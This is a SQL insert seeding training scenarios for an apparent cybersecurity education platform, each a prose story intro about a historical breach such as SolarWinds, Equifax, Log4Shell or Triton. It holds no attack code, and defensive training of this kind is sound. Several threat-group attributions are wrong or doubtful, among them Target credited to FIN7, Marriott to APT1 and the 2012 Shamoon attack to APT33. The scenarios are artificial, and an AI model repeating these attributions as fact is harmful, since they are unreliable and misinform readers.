INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(52, 'Operation Centrifuge Saboteur', 'Equation Group (Stuxnet)', 'Investigate a PLC rootkit by Equation Group causing physical damage to industrial systems.', 'Amidst rising geopolitical tensions, a covert cyber-weapon has been unleashed on critical infrastructure. The Equation Group, with its sophisticated arsenal, has deployed a rootkit targeting industrial PLCs. Your mission is to unravel this operation\'s intricacies, uncovering the plot that manipulates centrifuges while deceiving monitoring systems, ultimately leading to physical sabotage.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"cyber-weapon\\\\\\\",\\\\\\\"industrial control systems\\\\\\\",\\\\\\\"PLC rootkit\\\\\\\",\\\\\\\"Equation Group\\\\\\\",\\\\\\\"Stuxnet\\\\\\\"]\\\"\"', '', 5, '2026-01-07 22:33:37', 'Operation Centrifuge Saboteur', 'Investigate a PLC rootkit by Equation Group causing physical damage to industrial systems.', 'operation-centrifuge-saboteur', 1),
(53, 'Operation Sunburst', 'APT29 (Cozy Bear / Nobelium)', 'Analyze the SolarWinds attack by APT29, focusing on the SUNBURST backdoor and C2 techniques.', 'In December 2020, one of the most sophisticated cyber espionage operations in history was uncovered. APT29, a cyber threat group linked to Russia\'s Foreign Intelligence Service, infiltrated the software supply chain of SolarWinds. By injecting a backdoor known as SUNBURST into an Orion software update, they gained access to multiple high-value targets, including government agencies. This training scenario will guide you through the investigation of this complex supply chain attack, exploring the domain generation algorithm used for command and control, and the second-stage payloads deployed to compromise sensitive networks.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT29\\\\\\\",\\\\\\\"SolarWinds\\\\\\\",\\\\\\\"Cyber Espionage\\\\\\\",\\\\\\\"Supply Chain Attack\\\\\\\",\\\\\\\"SUNBURST\\\\\\\"]\\\"\"', '', 8, '2026-01-07 22:37:57', 'Advanced Cybersecurity Training: APT29\'s SolarWinds Supply Chain Attack', 'Analyze the SolarWinds attack by APT29, focusing on the SUNBURST backdoor and C2 techniques.', 'operation-sunburst', 1),
(54, 'Operation Sony Spectacle', 'Lazarus Group (North Korea)', 'Beginner-level training on the Sony Pictures hack by Lazarus Group, focusing on Destover malware analysis and data exfiltration tracing.', 'In 2014, the entertainment industry was rocked by a devastating cyberattack on Sony Pictures, attributed to the notorious Lazarus Group. This training scenario invites you to step into the shoes of a cybersecurity analyst, dissecting the infamous attack. You\'ll analyze the destructive \'Destover\' wiper malware, trace complex proxy chains used for data exfiltration, and delve into the geopolitical motivations that drove this high-profile breach.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sony Pictures hack\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Destover malware\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"beginner\\\\\\\"]\\\"\"', '', 7, '2026-01-07 22:38:59', 'Cybersecurity Training: Analyzing the Sony Pictures Hack by Lazarus Group', 'Beginner-level training on the Sony Pictures hack by Lazarus Group, focusing on Destover malware analysis and data exfiltration tracing.', 'operation-sony-spectacle', 1),
(55, 'Operation Bullseye', 'FIN7 / Anunak', 'Investigate the FIN7 APT Target breach, tracing from HVAC vendor compromise to POS malware and payment network infiltration.', 'During the bustling holiday season, a major retail chain, Target, fell victim to an orchestrated cyberattack. This operation simulates the breach orchestrated by the notorious FIN7 group, also known as Anunak, which led to the compromise of 40 million credit cards. Participants will follow the trail from an unsuspecting HVAC vendor compromise to sophisticated RAM-scraping malware infiltrating POS systems and finally, uncover the lateral movements within the payment network.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Target breach\\\\\\\",\\\\\\\"FIN7\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"APT\\\\\\\",\\\\\\\"POS malware\\\\\\\"]\\\"\"', '', 5, '2026-01-08 21:59:26', 'FIN7\'s Retail Breach: Uncovering the Target Holiday Heist', 'Investigate the FIN7 APT Target breach, tracing from HVAC vendor compromise to POS malware and payment network infiltration.', 'operation-bullseye', 1),
(56, 'Operation Credit Bureau', 'Chinese State-Sponsored (Unattributed)', 'Train on responding to the Equifax breach; analyze Apache Struts exploitation and persistence tactics.', 'In 2017, Equifax faced a catastrophic data breach, exposing 147 million Americans\' personal data. This scenario immerses you in the incident response team tasked with analyzing and mitigating the attack. You will navigate through the exploitation of Apache Struts vulnerability CVE-2017-5638, uncover the undetected dwell time, and understand the persistence mechanisms employed by a Chinese state-sponsored APT group.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Equifax breach\\\",\\\"Apache Struts\\\",\\\"CVE-2017-5638\\\",\\\"cybersecurity training\\\",\\\"APT\\\"]\"', '', 10, '2026-01-08 22:03:35', 'Operation Breach Analysis: Equifax 2017 Incident Response Training', 'Train on responding to the Equifax breach; analyze Apache Struts exploitation and persistence tactics.', 'operation-credit-bureau', 1),
(57, 'Operation Log4Chaos', 'Multiple (Chinese APTs, Ransomware Groups)', 'Advanced training on Log4Shell exploitation by Chinese APTs and ransomware groups. Analyze JNDI payloads and cryptominer deployments.', 'In late 2021, a critical vulnerability known as Log4Shell (CVE-2021-44228) began affecting millions of Java applications worldwide. As organizations scrambled to patch, Chinese APTs and ransomware groups initiated a mass exploitation campaign. Trainees will navigate through the chaotic landscape, analyzing JNDI injection payloads and cryptominer deployments while racing against time to defend critical systems.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Log4Shell\\\",\\\"APT\\\",\\\"Ransomware\\\",\\\"Cybersecurity Training\\\",\\\"JNDI Injection\\\"]\"', '', 5, '2026-01-08 22:08:03', 'Operation Log4Shell: APT and Ransomware Exploit Race', 'Advanced training on Log4Shell exploitation by Chinese APTs and ransomware groups. Analyze JNDI payloads and cryptominer deployments.', 'operation-log4chaos', 1),
(58, 'Operation MOVEit Mayhem', 'Cl0p (TA505)', 'Train on Cl0p\'s zero-day exploitation of MOVEit, focusing on SQL injection, mass data theft, and unique extortion tactics.', 'In this scenario, the notorious Cl0p group has discovered a zero-day vulnerability in the widely-used MOVEit file transfer platform. As organizations worldwide unknowingly expose sensitive data due to an SQL injection flaw, Cl0p orchestrates an unprecedented mass data theft. Uniquely, the group opts for a strategic extortion model, choosing not to deploy ransomware encryptors, challenging security teams to respond without the typical encryption-based clues.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Cl0p\\\\\\\",\\\\\\\"Zero-Day Exploitation\\\\\\\",\\\\\\\"SQL Injection\\\\\\\",\\\\\\\"MOVEit Platform\\\\\\\",\\\\\\\"Cyber Extortion\\\\\\\"]\\\"\"', '', 5, '2026-01-08 22:11:08', 'Cl0p\'s Zero-Day Exploitation of MOVEit: A Cybersecurity Training Scenario', 'Train on Cl0p\'s zero-day exploitation of MOVEit, focusing on SQL injection, mass data theft, and unique extortion tactics.', 'operation-moveit-mayhem', 1),
(59, 'Operation ProxyShell', 'Multiple (Hafnium, LockBit, Conti)', 'Investigate APT and ransomware exploitation of Microsoft Exchange vulnerabilities for web shell deployment and privilege escalation.', 'In early 2021, Microsoft Exchange servers worldwide became prime targets due to critical vulnerabilities. These security gaps were rapidly weaponized by both state-sponsored APT groups like Hafnium and financially-motivated ransomware operators such as LockBit and Conti. Trainees will investigate the exploitation chain, from initial access to data exfiltration, understanding the threat landscape\'s complexity.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Microsoft Exchange vulnerabilities\\\",\\\"APT groups\\\",\\\"ransomware\\\",\\\"cybersecurity training\\\",\\\"web shell\\\"]\"', '', 5, '2026-01-08 22:14:11', 'Operation Exchange Exploit: APTs and Ransomware', 'Investigate APT and ransomware exploitation of Microsoft Exchange vulnerabilities for web shell deployment and privilege escalation.', 'operation-proxyshell', 1),
(60, 'Operation Meat Grinder', 'REvil (Sodinokibi)', 'Learn to respond to the REvil ransomware attack on JBS Foods by analyzing tactics, tracing Bitcoin payments, and investigating fund recovery.', 'In May 2021, JBS Foods, a global meat processing giant, was hit by a notorious ransomware attack orchestrated by the REvil group. The attack disrupted meat production across North America and Australia, leading to an $11 million Bitcoin ransom payment. In this training scenario, you will step into the shoes of a cyber threat analyst. Your mission is to unravel the intricate layers of this attack, trace the ransom payment, and understand the FBI\'s role in recovering part of the funds. Prepare to dive deep into the tactics of REvil\'s affiliates and strengthen your cyber defense skills.', 'novice', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"REvil\\\\\\\",\\\\\\\"ransomware\\\\\\\",\\\\\\\"JBS Foods\\\\\\\",\\\\\\\"Bitcoin tracing\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\"]\\\"\"', '', 3, '2026-01-11 23:32:33', 'REvil Ransomware Training: Tracing JBS Foods Attack and Bitcoin Ransom', 'Learn to respond to the REvil ransomware attack on JBS Foods by analyzing tactics, tracing Bitcoin payments, and investigating fund recovery.', 'operation-meat-grinder', 1),
(61, 'Operation Meat Grinder', 'REvil (Sodinokibi)', 'Master an expert-level response to the REvil ransomware attack on JBS Foods, tracing ransom payments and analyzing FBI fund recovery.', 'In this expert-level training scenario, participants will be immersed in the high-stakes environment following the REvil group’s notorious ransomware attack on JBS Foods. The attack, which halted meat production across North America and Australia, resulted in a staggering $11 million Bitcoin ransom payment. Trainees will work to trace the digital ransom trail, dissect the affiliate\'s advanced tactics, and delve into the FBI\'s partial recovery of funds, unraveling the sophisticated layers of this cyber offensive.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"REvil\\\",\\\"ransomware\\\",\\\"JBS Foods\\\",\\\"cybersecurity training\\\",\\\"Bitcoin ransom\\\"]\"', '', 5, '2026-01-11 23:34:33', 'Expert Response to REvil\'s JBS Foods Ransomware Attack', 'Master an expert-level response to the REvil ransomware attack on JBS Foods, tracing ransom payments and analyzing FBI fund recovery.', 'operation-meat-grinder', 1),
(62, 'Operation BlackEnergy', 'Sandworm (Russian GRU Unit 74455)', 'Investigate Sandworm\'s 2015 cyberattack on Ukraine\'s power grid via BlackEnergy malware and KillDisk wiper.', 'In December 2015, the world witnessed the first confirmed cyberattack on a power grid. The notorious Sandworm group, a Russian cyber military unit, executed a meticulously planned attack that plunged 230,000 Ukrainians into darkness. Trainees will dissect the sophisticated use of BlackEnergy malware, the destructive KillDisk wiper, and the manipulation of SCADA systems, unraveling the methods behind this landmark cyber assault.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Sandworm\\\",\\\"BlackEnergy\\\",\\\"KillDisk\\\",\\\"SCADA\\\",\\\"Cyberattack\\\"]\"', '', 5, '2026-01-11 23:36:40', 'Advanced Analysis of Sandworm\'s 2015 Ukrainian Power Grid Attack', 'Investigate Sandworm\'s 2015 cyberattack on Ukraine\'s power grid via BlackEnergy malware and KillDisk wiper.', 'operation-blackenergy', 1),
(63, 'Operation Anthem Blues', 'Deep Panda (APT19)', 'Investigate Deep Panda\'s breach of Anthem, exposing 78.8M records via a phishing campaign and \'Derusbi\' malware.', 'In a chilling demonstration of stealth and strategy, APT19, also known as Deep Panda, executed a sophisticated cyberattack on Anthem, one of the largest health insurance providers in the United States. The breach resulted in the exposure of 78.8 million patient records, revealing a calculated phishing campaign targeting IT administrators, the deployment of custom \'Derusbi\' malware, and an unusual lack of encryption on the stolen database. As an investigator, you will delve into the intricacies of this operation, following the digital breadcrumbs left by the attackers.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Deep Panda\\\",\\\"Anthem breach\\\",\\\"cybersecurity training\\\",\\\"APT19\\\",\\\"Derusbi malware\\\"]\"', '', 5, '2026-01-11 23:41:38', 'Deep Panda\'s Infiltration: The Anthem Health Breach', 'Investigate Deep Panda\'s breach of Anthem, exposing 78.8M records via a phishing campaign and \'Derusbi\' malware.', 'operation-anthem-blues', 1),
(64, 'Operation OPM Heist', 'APT1 (Comment Crew) / Deep Panda', 'Analyze the OPM breach exposing federal data, focusing on PlugX RAT and counterintelligence implications.', 'In 2015, the U.S. Office of Personnel Management was breached by a sophisticated APT group, resulting in the compromise of 21.5 million federal employee records. This training scenario focuses on the deployment of the PlugX RAT, theft of fingerprint records, and the impact on national security through stolen SF-86 forms. Trainees will delve into the tactics and techniques used by the attackers, specifically APT1\'s strategic exploitation, persistence, and data exfiltration operations.', 'novice', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT1\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"OPM breach\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"PlugX RAT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"counterintelligence\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 3, '2026-01-11 23:43:46', 'Investigating the OPM Breach: Unraveling APT1\'s PlugX RAT Deployment', 'Analyze the OPM breach exposing federal data, focusing on PlugX RAT and counterintelligence implications.', 'operation-opm-heist', 1),
(65, 'Operation Marriott Checkout', 'APT1 (Chinese State-Sponsored)', 'Investigate APT1\'s stealthy breach of Marriott, analyzing RAT persistence and data encryption over four years.', 'In this operation, analysts are tasked with uncovering the sophisticated tactics employed by APT1, a Chinese state-sponsored group, in their prolonged and undetected breach of the Starwood/Marriott database. This breach, affecting 500 million guest records, showcases the group\'s expertise in maintaining persistence and evading detection through strategic use of Remote Access Trojans (RATs) and advanced data encryption. Participants will dive into the intricacies of the attack, focusing on the exposure of sensitive data such as passport numbers, and how the attackers leveraged the Starwood acquisition to their advantage.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"APT1\\\",\\\"Marriott Breach\\\",\\\"Cybersecurity Training\\\",\\\"Data Encryption\\\",\\\"Threat Intelligence\\\"]\"', '', 5, '2026-01-12 22:13:17', 'APT1 Infiltration: Unraveling the Starwood/Marriott Breach', 'Investigate APT1\'s stealthy breach of Marriott, analyzing RAT persistence and data encryption over four years.', 'operation-marriott-checkout', 1),
(66, 'Operation Capitol Breach', 'APT28 (Fancy Bear)', 'Analyze APT28\'s tactics in the 2016 DNC hack, focusing on X-Agent, X-Tunnel, and credential harvesting via spear-phishing.', 'In 2016, the Democratic National Committee was subjected to a sophisticated cyber attack that would become a pivotal moment in modern political history. The aggressive operation was attributed to APT28, a notorious Russian state-sponsored group known for its strategic cyber campaigns. This training scenario will delve into the group\'s use of X-Agent and X-Tunnel implants, the weaponization of stolen emails through WikiLeaks, and the spear-phishing techniques employed to harvest credentials, providing a comprehensive understanding of the cyber kill chain involved in this landmark attack.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT28\\\",\\\"DNC Hack\\\",\\\"Election Interference\\\",\\\"Cybersecurity Training\\\",\\\"Spear-Phishing\\\"]\"', '', 5, '2026-01-12 22:15:24', 'Investigating APT28\'s 2016 DNC Hack: A Comprehensive Training Scenario', 'Analyze APT28\'s tactics in the 2016 DNC hack, focusing on X-Agent, X-Tunnel, and credential harvesting via spear-phishing.', 'operation-capitol-breach', 1),
(67, 'Operation Shamoon Storm', 'APT33 (Elfin)', 'Dive into the analysis of APT33\'s Shamoon attack on Saudi Aramco, focusing on MBR overwrite and political motives.', 'In August 2012, a politically charged cyber assault shook the oil giant Saudi Aramco, wiping out data on 35,000 workstations. The attack, attributed to the notorious APT33 group, showcased a sophisticated MBR overwriting mechanism and left behind the telling image of a burning American flag. Investigators must dissect this complex attack, understanding the timing, motives, and techniques employed by the attackers.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"APT33\\\",\\\"Shamoon\\\",\\\"Saudi Aramco\\\",\\\"cybersecurity\\\",\\\"MBR overwrite\\\"]\"', '', 5, '2026-01-12 22:16:19', 'APT33 Shamoon Attack Investigation: Unraveling the Destruction of Saudi Aramco', 'Dive into the analysis of APT33\'s Shamoon attack on Saudi Aramco, focusing on MBR overwrite and political motives.', 'operation-shamoon-storm', 1),
(68, 'Operation Cobalt Factory', 'Cobalt Group', 'Investigate Cobalt Group\'s campaign targeting global ATM networks to prevent cyber heists.', 'The notorious Cobalt Group has launched a campaign targeting ATM infrastructures across more than 40 countries. Participants must unravel the complex web of ATM software manipulation, compromised card processing networks, and a sophisticated money mule operation. Your mission is to dissect each phase of the attack, understand the adversary\'s tactics, and devise strategies to thwart their efforts.', 'novice', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Cobalt Group\\\\\\\",\\\\\\\"ATM Cybersecurity\\\\\\\",\\\\\\\"Banking Threats\\\\\\\",\\\\\\\"Cyber Heist\\\\\\\",\\\\\\\"Financial Cybercrime\\\\\\\"]\\\"\"', '', 8, '2026-01-12 22:18:23', 'Cobalt Group ATM Heist Investigation Training', 'Investigate Cobalt Group\'s campaign targeting global ATM networks to prevent cyber heists.', 'operation-cobalt-factory', 1),
(69, 'Operation Swift Heist (Bangladesh)', 'Lazarus Group (APT38)', 'Explore the Lazarus Group\'s tactics in the $951 million Bangladesh Bank heist via SWIFT network manipulation.', 'In 2016, the cyber world was rocked by an audacious attempt to steal $951 million from the Bangladesh Bank. At the heart of this operation was the infamous Lazarus Group, a North Korean state-sponsored threat actor known for its cunning and precision. This training scenario will guide you through the investigation of this high-stakes heist. You will analyze the custom malware that concealed fraudulent transactions, the critical typo that thwarted the full theft, and how the stolen funds were laundered through Philippine casinos. Prepare yourself for an expert-level challenge in cyber threat intelligence analysis.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lazarus Group\\\",\\\"Bangladesh Bank Heist\\\",\\\"SWIFT network\\\",\\\"cybersecurity training\\\",\\\"APT38\\\"]\"', '', 7, '2026-01-12 22:18:54', 'Lazarus Group\'s Bangladesh Bank Heist Analysis', 'Explore the Lazarus Group\'s tactics in the $951 million Bangladesh Bank heist via SWIFT network manipulation.', 'operation-swift-heist-bangladesh', 1),
(70, 'Operation CCleaner', 'Barium (Winnti / APT41)', 'Investigate the CCleaner attack affecting 2.27M users, analyzing targeted espionage on 40 tech firms.', 'In September 2017, the world witnessed a massive supply chain attack on CCleaner, a popular utility tool. While 2.27 million users were affected, the true intent of the attack was far more sinister. Hidden within the chaos was a highly targeted espionage operation by APT41, surgically focused on 40 specific technology companies. Participants will delve into this complex scenario, tracing the steps of this notorious APT group and unveiling their covert objectives.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"CCleaner Supply Chain Attack\\\",\\\"APT41\\\",\\\"Cyber Espionage\\\",\\\"Technology Sector\\\",\\\"Supply Chain Security\\\"]\"', '', 3, '2026-01-12 22:24:29', 'Unveiling the CCleaner Supply Chain Attack by APT41', 'Investigate the CCleaner attack affecting 2.27M users, analyzing targeted espionage on 40 tech firms.', 'operation-ccleaner', 1),
(71, 'Operation Triton', 'EMP.Veles (Russian CNIIHM)', 'Learn to investigate the Triton/TRISIS malware targeting Triconex systems in a petrochemical plant by EMP.Veles.', 'In the heart of a bustling petrochemical plant, the hum of machinery is a constant backdrop. However, a sinister threat lurks beneath the surface. The notorious APT group, EMP.Veles, has set its sights on the plant\'s Schneider Electric Triconex safety systems. Their goal: to manipulate the safety instrumented systems (SIS) using the Triton/TRISIS malware, potentially causing catastrophic physical damage or even loss of life. As part of the cybersecurity response team, it is your mission to unravel this plot and prevent disaster.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Triton malware\\\",\\\"EMP.Veles\\\",\\\"Schneider Electric\\\",\\\"SIS\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-13 01:50:57', 'Beginner Training: Investigating Triton/TRISIS Attack by EMP.Veles', 'Learn to investigate the Triton/TRISIS malware targeting Triconex systems in a petrochemical plant by EMP.Veles.', 'operation-triton', 1),
(72, 'Operation Conti Ransomware', 'Conti', 'Simulate a response to Conti\'s attack on Ireland\'s HSE, focusing on data theft and system crippling.', 'In May 2021, the Conti ransomware group executed a highly sophisticated attack on Ireland\'s Health Service Executive (HSE), leading to the theft of 700GB of sensitive data and a temporary shutdown of critical healthcare systems, including COVID-19 vaccination services. While decryption keys were eventually provided, the attackers still leaked parts of the stolen data, raising questions about their motives and tactics. This training scenario will guide you through the steps of analyzing and responding to this complex cyber crisis.', 'novice', 0, 1, 1, 60, NULL, '\"[\\\"Conti ransomware\\\",\\\"HSE cyberattack\\\",\\\"cybersecurity training\\\",\\\"data breach analysis\\\",\\\"novice cyber operations\\\"]\"', '', 3, '2026-01-13 01:55:42', 'Conti Ransomware Response Training: The HSE Attack', 'Simulate a response to Conti\'s attack on Ireland\'s HSE, focusing on data theft and system crippling.', 'operation-conti-ransomware', 1),
(73, 'Operation VPN Exploit', 'Hafnium', 'Investigate Hafnium\'s mass exploitation of VPNs targeting defense contractors and government agencies.', 'In early 2023, the notorious APT group Hafnium launched a coordinated attack targeting vulnerable VPN appliances. Utilizing authentication bypass vulnerabilities, they infiltrated networks of defense contractors and government agencies. Your mission is to investigate these breaches, analyze the persistence mechanisms, and understand the implications of these intrusions for national security.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"Hafnium\\\",\\\"VPN exploitation\\\",\\\"defense contractors\\\",\\\"government agencies\\\",\\\"cybersecurity training\\\"]\"', '', 4, '2026-01-15 00:48:47', 'Hafnium\'s VPN Exploitation Tactics: A Cybersecurity Training Scenario', 'Investigate Hafnium\'s mass exploitation of VPNs targeting defense contractors and government agencies.', 'operation-vpn-exploit', 1),
(74, 'Operation Kaseya Cascade', 'REvil (Sodinokibi)', 'Investigate REvil\'s Kaseya VSA exploit targeting 1,500+ businesses via MSP supply chain compromise.', 'On the eve of Independence Day, a notorious APT group, REvil, executed a massive ransomware attack exploiting a zero-day vulnerability in Kaseya VSA software. This sophisticated supply chain compromise struck over 1,500 businesses in one fell swoop. Trainees will delve into the intricacies of this attack, from the initial infiltration to the decryption key acquisition, and explore the $70 million ransom demand that held global businesses at ransom.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"REvil\\\",\\\"Kaseya VSA\\\",\\\"ransomware\\\",\\\"supply chain attack\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-15 00:49:21', 'REvil\'s Supply Chain Infiltration: Kaseya VSA Exploit', 'Investigate REvil\'s Kaseya VSA exploit targeting 1,500+ businesses via MSP supply chain compromise.', 'operation-kaseya-cascade', 1),
(75, 'Operation Ukraine Grid 2016', 'Sandworm (Industroyer/CrashOverride)', 'Dive into Sandworm\'s 2016 Ukrainian power grid attack, analyzing the Industroyer malware framework\'s ICS protocol intricacies.', 'In December 2016, Ukraine faced a second debilitating cyberattack on its power grid, orchestrated by the notorious Sandworm group. Using the sophisticated Industroyer framework, this operation marked the first deployment of malware specifically tailored for electric grid systems. Your mission is to unravel the complexities of this attack, focusing on the threat actor\'s deep understanding of critical ICS protocols like IEC 101, IEC 104, and OPC, and the seamless coordination of multi-substation assaults.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Sandworm\\\",\\\"Industroyer\\\",\\\"ICS Protocols\\\",\\\"Cybersecurity Training\\\",\\\"Ukrainian Power Grid Attack\\\"]\"', '', 6, '2026-01-15 00:51:24', 'Investigate Sandworm\'s Industroyer Attack on Ukrainian Power Grid', 'Dive into Sandworm\'s 2016 Ukrainian power grid attack, analyzing the Industroyer malware framework\'s ICS protocol intricacies.', 'operation-ukraine-grid-2016', 1),
(76, 'Operation Capital One', 'Insider / Opportunistic', 'Investigate the Capital One breach involving AWS misconfiguration, SSRF attack, and insider IAM role abuse.', 'In July 2019, a massive data breach exposed 100 million credit applications at Capital One due to a sophisticated attack involving a misconfigured AWS Web Application Firewall (WAF). The breach was orchestrated by an insider with deep cloud expertise, leveraging a Server-Side Request Forgery (SSRF) attack vector and abusing IAM roles. Your mission is to analyze the attack sequence, identify the security gaps exploited, and understand the insider\'s motivations and methods.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Capital One breach\\\",\\\"SSRF attack\\\",\\\"AWS misconfiguration\\\",\\\"insider threat\\\",\\\"IAM role abuse\\\"]\"', '', 5, '2026-01-15 00:52:37', 'Insider Threat: Capital One Cloud Breach Investigation', 'Investigate the Capital One breach involving AWS misconfiguration, SSRF attack, and insider IAM role abuse.', 'operation-capital-one', 1),
(77, 'Operation Twitter Takeover', 'Social Engineering / Insider', 'Investigate the Twitter hack targeting high-profile accounts via social engineering and insider threats, leading to a Bitcoin scam.', 'In the summer of 2020, Twitter faced a significant breach that saw high-profile accounts like Barack Obama, Elon Musk, and Bill Gates compromised. This operation examines the social engineering tactics used against Twitter employees, the exploitation of internal admin tools, and the ultimate cryptocurrency theft of $120,000. Participants will delve into the attack chain, understanding how insider threats can unravel even the most secure systems.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"social engineering\\\",\\\"Twitter hack\\\",\\\"insider threat\\\",\\\"Bitcoin scam\\\",\\\"cybersecurity training\\\"]\"', '', 4, '2026-01-15 00:55:02', 'Social Engineering Exploitation: The 2020 Twitter Hack', 'Investigate the Twitter hack targeting high-profile accounts via social engineering and insider threats, leading to a Bitcoin scam.', 'operation-twitter-takeover', 1),
(78, 'Operation Mimecast Compromise', 'APT29 (Nobelium/Cozy Bear)', 'Investigate APT29\'s strategic compromise of Mimecast certificates to infiltrate Microsoft 365 environments.', 'In the wake of the infamous SolarWinds attack, APT29 has launched a sophisticated campaign targeting Mimecast to exploit trust in the supply chain. Tasked with investigating the breach, analysts must uncover how stolen certificates facilitated unauthorized access to Microsoft 365 environments, threatening critical infrastructure and government entities.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"APT29\\\",\\\"Mimecast\\\",\\\"Microsoft 365\\\",\\\"Supply Chain Attacks\\\",\\\"Cybersecurity Training\\\"]\"', '', 5, '2026-01-15 00:55:32', 'APT29\'s Exploitation of Mimecast in SolarWinds Aftermath', 'Investigate APT29\'s strategic compromise of Mimecast certificates to infiltrate Microsoft 365 environments.', 'operation-mimecast-compromise', 1),
(79, 'Operation Uber Breach', 'Lapsus$ (Teen Hackers)', 'Investigate the 2022 Uber breach by Lapsus$ using advanced techniques like MFA fatigue and social engineering.', 'In 2022, the notorious teenage hacker group Lapsus$ launched a brazen attack on Uber, exploiting human vulnerabilities and technical gaps. Your mission is to dissect the breach, understand the attack vectors, and uncover the methods used to infiltrate and exfiltrate sensitive data. This scenario challenges you to think like an attacker and defend like a cybersecurity expert.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Lapsus$\\\",\\\"Uber breach\\\",\\\"MFA fatigue\\\",\\\"cybersecurity training\\\",\\\"APT simulation\\\"]\"', '', 7, '2026-01-15 00:55:57', 'Lapsus$ APT Simulation: Unraveling the Uber Breach', 'Investigate the 2022 Uber breach by Lapsus$ using advanced techniques like MFA fatigue and social engineering.', 'operation-uber-breach', 1),
(80, 'Operation LastPass Vault', 'Unknown (Targeted Attack)', 'Investigate the sophisticated LastPass breach affecting 30 million users by tracing initial access and assessing risks to encryption keys.', 'In an alarming breach affecting 30 million users, LastPass\'s encrypted vaults were compromised. The initial vector exploited a DevOps engineer\'s home computer, leading to the theft of critical cloud storage encryption keys. As part of a skilled cybersecurity team, you\'re tasked with dissecting this attack to uncover the unknown APT group behind it and determine the threat to users\' master passwords.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"LastPass breach\\\",\\\"APT investigation\\\",\\\"DevOps compromise\\\",\\\"encryption keys\\\",\\\"cybersecurity training\\\"]\"', '', 6, '2026-01-15 00:58:12', 'Advanced Analysis of LastPass Breach: DevOps Compromise Investigation', 'Investigate the sophisticated LastPass breach affecting 30 million users by tracing initial access and assessing risks to encryption keys.', 'operation-lastpass-vault', 1),
(81, 'Operation Okta Intrusion', 'Lapsus$ (DEV-0537)', 'Investigate the Okta breach by Lapsus$ through third-party access, focusing on the SuperUser portal and 366 affected customers.', 'In this expert-level training scenario, you will delve into the infamous Okta breach orchestrated by the Lapsus$ group. As a senior analyst, your mission is to unravel the complexities of this attack, which compromised 366 customers through a third-party support contractor. You will explore the implications on supply chain trust for identity-as-a-service providers and gain insights on securing the SuperUser portal.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Okta breach\\\",\\\"Lapsus$\\\",\\\"supply chain attack\\\",\\\"identity-as-a-service\\\",\\\"cybersecurity\\\"]\"', '', 6, '2026-01-15 00:58:37', 'Advanced Cyber Training: Analyzing the Lapsus$ Okta Breach', 'Investigate the Okta breach by Lapsus$ through third-party access, focusing on the SuperUser portal and 366 affected customers.', 'operation-okta-intrusion', 1),
(82, 'Operation Nvidia Heist', 'Lapsus$', 'Investigate a 1TB data theft by Lapsus$, analyze extortion demands, and explore public spectacle tactics.', 'In a high-stakes cybercrime scenario, the notorious APT group Lapsus$ has struck again, claiming responsibility for the theft of 1TB of Nvidia\'s proprietary data. Among the stolen assets are GPU drivers, firmware, and code-signing certificates. Lapsus$ demands Nvidia to open-source their drivers, using unconventional public spectacle tactics to amplify their extortion. As part of an expert team, your mission is to dissect this complex breach, unravel the group\'s attack chain, and determine how they leveraged public disclosure to pressure Nvidia.', 'expert', 0, 1, 1, 60, NULL, '\"[\\\"Lapsus$\\\",\\\"Nvidia breach\\\",\\\"cybersecurity training\\\",\\\"APT investigation\\\",\\\"data theft\\\"]\"', '', 7, '2026-01-15 00:59:01', 'Advanced Cyber Ops Training: Lapsus$ Nvidia Breach Investigation', 'Investigate a 1TB data theft by Lapsus$, analyze extortion demands, and explore public spectacle tactics.', 'operation-nvidia-heist', 1),
